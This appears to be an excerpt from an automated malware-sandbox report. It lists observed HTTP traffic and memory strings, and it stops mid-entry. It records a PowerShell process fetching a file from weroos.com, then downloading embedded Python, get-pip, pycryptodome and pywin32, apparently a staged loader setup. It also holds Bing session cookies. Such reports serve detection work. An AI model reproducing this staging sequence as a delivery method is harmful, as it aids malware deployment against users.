Source: global traffic HTTP traffic detected: GET /rp/TdECMV0TRBVEcANtOCAjiC_gQ1M.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/Uicjz5_Idvl9FRKtwKPHILZoadU.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?62429672578152eea57f84aafc162f64 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/XUoKWXdZQS2iuOnv0a_-gwXn0RY.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /apc/trans.gif?456f89d19c3134a687f24503b7eb5933 HTTP/1.1host: spo-ring.msedge.netreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: image/png,image/svg+xml,image/*;q=0.8,*/*;q=0.5accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/YdkRJN1Cgndw2b5FyfmuFrQJnME.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /r.gif?MonitorID=asgw&rid=f90d9d78e1ee958148fa709861896dba&w3c=true&prot=https:&v=20190506&DATA=[{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:666,%22T%22:1},{%22RequestID%22:%22b-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:650,%22T%22:1},{%22RequestID%22:%22spo-ring.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22warm%22,%22Result%22:129,%22T%22:1},{%22RequestID%22:%22t-ring-fdv2.msedge.net%22,%22Object%22:%22trans.gif%22,%22Conn%22:%22cold%22,%22Result%22:-1,%22T%22:1}] HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
Source: global traffic HTTP traffic detected: GET /rp/Z9hYXc38AnqyLF2U6SIx7fPVgp0.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/ZGYsYc-4cfWAUrRQfDPHboO8Xgc.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /SDkwjk.txt HTTP/1.1
  Host: weroos.com
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ftp/python/3.11.8/python-3.11.8-embed-amd64.zip HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: www.python.org
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /get-pip.py HTTP/1.1
  User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
  Host: bootstrap.pypa.io
  Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /simple/pip/ HTTP/1.1
  Host: pypi.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: gzip, deflate
  Accept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01
  Connection: keep-alive
  Cache-Control: max-age=0
Source: global traffic HTTP traffic detected: GET /packages/29/a2/d40fb2460e883eca5199c62cfc2463fd261f760556ae6290f88488c362c0/pip-25.1.1-py3-none-any.whl.metadata HTTP/1.1
  Host: files.pythonhosted.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: identity
  Accept: */*
  Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /simple/setuptools/ HTTP/1.1
  Host: pypi.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: gzip, deflate
  Accept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01
  Connection: keep-alive
  Cache-Control: max-age=0
Source: global traffic HTTP traffic detected: GET /packages/a3/dc/17031897dae0efacfea57dfd3a82fdd2a2aeb58e0ff71b77b87e44edc772/setuptools-80.9.0-py3-none-any.whl.metadata HTTP/1.1
  Host: files.pythonhosted.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: identity
  Accept: */*
  Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /simple/wheel/ HTTP/1.1
  Host: pypi.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: gzip, deflate
  Accept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01
  Connection: keep-alive
  Cache-Control: max-age=0
Source: global traffic HTTP traffic detected: GET /packages/0b/2c/87f3254fd8ffd29e4c02732eee68a83a1d3c346ae39bc6822dcbcb697f2b/wheel-0.45.1-py3-none-any.whl.metadata HTTP/1.1
  Host: files.pythonhosted.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: identity
  Accept: */*
  Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /packages/29/a2/d40fb2460e883eca5199c62cfc2463fd261f760556ae6290f88488c362c0/pip-25.1.1-py3-none-any.whl HTTP/1.1
  Host: files.pythonhosted.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: identity
  Accept: */*
  Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /packages/a3/dc/17031897dae0efacfea57dfd3a82fdd2a2aeb58e0ff71b77b87e44edc772/setuptools-80.9.0-py3-none-any.whl HTTP/1.1
  Host: files.pythonhosted.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: identity
  Accept: */*
  Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /packages/0b/2c/87f3254fd8ffd29e4c02732eee68a83a1d3c346ae39bc6822dcbcb697f2b/wheel-0.45.1-py3-none-any.whl HTTP/1.1
  Host: files.pythonhosted.org
  User-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","system":{"name":"Windows","release":"10"}}
  Accept-Encoding: identity
  Accept: */*
  Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /rp/a2xp3ZIPaHymjkEpVoRLe8IDcCs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /rp/bW5YZAHlbTlzzS2JT_speOW7v7c.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
Source: global traffic HTTP traffic detected: GET /simple/pycryptodome/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic HTTP traffic detected: GET /packages/54/2f/e97a1b8294db0daaa87012c24a7bb714147c7ade7656973fd6c736b484ff/pycryptodome-3.23.0-cp37-abi3-win_amd64.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /simple/pypiwin32/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic HTTP traffic detected: GET /packages/d0/1b/2f292bbd742e369a100c91faa0483172cd91a1a422a6692055ac920946c5/pypiwin32-223-py3-none-any.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /simple/pywin32/ HTTP/1.1Host: pypi.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: gzip, deflateAccept: application/vnd.pypi.simple.v1+json, application/vnd.pypi.simple.v1+html; q=0.1, text/html; q=0.01Connection: keep-aliveCache-Control: max-age=0
Source: global traffic HTTP traffic detected: GET /packages/b3/bd/d1592635992dd8db5bb8ace0551bc3a769de1ac8850200cfa517e72739fb/pywin32-310-cp311-cp311-win_amd64.whl.metadata HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
Source: global traffic HTTP traffic detected: GET /packages/54/2f/e97a1b8294db0daaa87012c24a7bb714147c7ade7656973fd6c736b484ff/pycryptodome-3.23.0-cp37-abi3-win_amd64.whl HTTP/1.1Host: files.pythonhosted.orgUser-Agent: pip/25.1.1 {"ci":null,"cpu":"AMD64","implementation":{"name":"CPython","version":"3.11.8"},"installer":{"name":"pip","version":"25.1.1"},"openssl_version":"OpenSSL 3.0.13 30 Jan 2024","python":"3.11.8","setuptools_version":"80.9.0","system":{"name":"Windows","release":"10"}}Accept-Encoding: identityAccept: */*Connection: keep-alive
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C7D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D764000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CE17000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D07F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D57E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D5CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C412000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 
00000014.00000002.2430196928.0000025F2C758000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D458000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: powershell.exe, 00000014.00000002.2430196928.0000025F2D657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA53000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2BF68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D4CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CA31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2CDEB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2D622000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C692000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2430196928.0000025F2C71E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 